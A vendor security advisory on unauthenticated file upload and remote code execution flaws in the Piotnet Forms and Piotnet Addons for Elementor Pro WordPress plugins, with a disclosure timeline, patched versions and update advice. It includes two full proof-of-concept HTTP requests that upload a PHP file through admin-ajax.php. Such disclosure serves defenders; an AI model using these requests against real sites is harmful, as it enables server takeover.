High severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons For Elementor Pro Plugins
Recently, the Imunify360 team discovered high severity vulnerabilities in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro Plugins. Sergey Brazhnik, Security Analyst from Imunify360 Web Protection Team conducted a detailed analysis of Piotnet forms and addons vulnerabilities. Keep on reading to find out more about the following:
- Piotnet Vulnerabilities: Summary and Timeline
- Piotnet Vulnerabilities Details
- Recommendations
- Recommended articles
Piotnet Vulnerabilities: Summary and Timeline
On July 7, 2021, the Imunify360 Web Protection team started the responsible disclosure process for Unauthenticated File Upload and Remote Code Execution vulnerabilities discovered in Piotnet Forms Free/Pro and Piotnet Addons for Elementor Pro plugins. An attacker could potentially upload malicious files to the plugins upload directory and execute the uploaded scripts.
Naturally, Imunify360 customers were protected from these vulnerabilities and all initial exploitation attempts were blocked by Imunify360.
The Piotnet developers were provided with a detailed report on July 7, 2021, and followed up with PoC and recommendations on August 25, 2021. Since there were no updates from developers, the Wordpress.org plugins team was informed about a vulnerable free plugin version available on https://wordpress.org/plugins/piotnetforms/ marketplace. The WordPress.org team temporarily blocked the plugin from public access on September 27, 2021, as a result, the new 1.0.23 version of Piotnet Forms Free was released on October 1, 2021.
Finally, on October 13, 2021, Pitonet developers released patched versions of Piotnet Forms Pro (1.1.14) and Piotnet Addons For Elementor Pro (6.4.12).
Piotnet Vulnerabilities Details
Description: Unauthenticated File Upload and RCE in Piotnet Forms
Affected Plugin: Piotnet Forms
Affected Versions: <= 1.0.22
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.0.23
Description: Unauthenticated File Upload and RCE in Piotnet Forms Pro
Affected Plugin: Piotnet Forms Pro
Affected Versions: <=1.1.13
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 1.1.14
For the Piotnet Forms plugins, both Free and Pro versions, the vulnerable function is:
piotnetforms_ajax_form_builder |
Vulnerable file:
inc/forms/ajax-form-builder.php |
The function is allowed for non-authenticated users:
Furthermore, there is no validation for parameters required by this function like post_id and form_id, and for an attack to be successful the parameters just should be transferred.
Next, the function's code doesn't check the extension of the uploaded files, which makes it possible to upload different extension files and execute them further.
Finally, although the file name is generated randomly, /wp-content/uploads/piotnetforms/files/ folder has file listing enabled and is available for visitors to view.
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: vuln_domain.com Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=--------205816383 Content-Length: 645 Origin: http://vuln_domain.com Connection: close ----------205816383 Content-Disposition: form-data; name="action" piotnetforms_ajax_form_builder ----------205816383 Content-Disposition: form-data; name="post_id" 11111 ----------205816383 Content-Disposition: form-data; name="form_id" d253bdb1 ----------205816383 Content-Disposition: form-data; name="fields" [] ----------205816383 Content-Disposition: form-data; name="referrer" http://domain.com/?page_id=2 ----------205816383 Content-Disposition: form-data; name="file[]"; filename="file.php" Content-Type: application/octet-stream <?php echo("PoC for vulnerability is confirmed"); ?> ----------205816383-- |
Description: Unauthenticated File Upload and RCE in Piotnet Addons for Elementor Pro
Affected Plugin: Piotnet Addons for Elementor Pro
Affected Versions: <=6.4.11
CVE ID: pending
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Fully Patched Version: 6.4.12
For Piotnet Addons For Elementor Pro, the case is quite similar, except the function name is pafe_ajax_form_builder and the uploads directory in /wp-content/uploads/piotnet-addons-for-elementor/, while the rest of the code is identical. The free version available on https://wordpress.org/plugins/piotnet-addons-for-elementor/ is NOT affected since it doesn’t contain the vulnerable functionality.
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: vuln_domain.com Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=--------205816383 Content-Length: 645 Origin: http://vuln_domain.com Connection: close ----------205816383 Content-Disposition: form-data; name="action" pafe_ajax_form_builder ----------205816383 Content-Disposition: form-data; name="post_id" 11111 ----------205816383 Content-Disposition: form-data; name="form_id" d253bdb1 ----------205816383 Content-Disposition: form-data; name="fields" [] ----------205816383 Content-Disposition: form-data; name="referrer" http://domain.com/?page_id=2 ----------205816383 Content-Disposition: form-data; name="file[]"; filename="file.php" Content-Type: application/octet-stream <?php echo("PoC for vulnerability is confirmed"); ?> ----------205816383-- |
Recommendations
To protect your servers from vulnerabilities exploitation we strongly recommend:
- Enabling Imunify360 security features like WAF, Proactive Defence, Real-time Malware Scan and PHP Immunity, since, apart from rules created for these particular vulnerabilities, your servers will be proactively protected with a complex generic system that is able to detect suspicious activity and stop attackers on the fly.
- Updating your Piotnet plugins to the latest versions.
Take your web hosting security to the next level with Imunify360 security suite. Imunify360 is a complete security suite with all components working together to keep your servers safe and running while you could focus on other business tasks. Imunify360 is a synergy of Antivirus for Linux Server, Firewall, WAF, PHP Security Layer, Patch Management, Domain Reputation with easy UI and advanced automation. Try Imunify360 free for 14 days and see results in just one week.
Recommended Articles
- 17 ways to improve your cPanel security
- WordPress Security Fundamentals Ultimate Guide 2021
- Proactive vs. Reactive Security: 5 Tips for Proactive Cyber Security
- 15 security tips for Linux VPS Hosting
- Top 15 Plesk Server Security Best Practices to Protect Your Website
- Top 10 Web Hosting Security Best Practices
- What Are Your First Three Steps When Securing a Linux Server?
- What are steps to secure a Linux server?
- How to keep your website secure in 2021
- Shared Hosting Security Guide for 2021
- Ultimate Guide for DirectAdmin Security from Security Experts
- Security made easy with Imunify360
- ModSecurity Rules: How to Guide
- What are Antivirus False Positives and What to do about them?
- cPanel hacks: How to protect your cPanel account